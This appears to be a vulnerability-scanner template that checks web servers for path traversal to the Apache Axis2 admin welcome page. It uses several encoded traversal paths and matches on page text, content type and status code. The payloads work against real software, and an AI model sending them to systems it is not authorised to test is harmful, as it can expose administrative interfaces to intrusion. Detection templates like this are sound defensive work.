id: axis2_traversal

info:
  name: axis2 traversal
  author: xandsz
  severity: low
  tags: traversal

requests:
  - method: GET
    path:
      - "{{BaseURL}}/..;/axis2/axis2-admin/welcome"
      - "{{BaseURL}}/..;/..;/axis2/axis2-admin/welcome"
      - "{{BaseURL}}/..%5Caxis2/axis2-admin/welcome"
      - "{{BaseURL}}/..%5C..%5Caxis2/axis2-admin/welcome"
      - "{{BaseURL}}../axis2/axis2-admin/welcome"
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Welcome to the Axis2 administration"

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
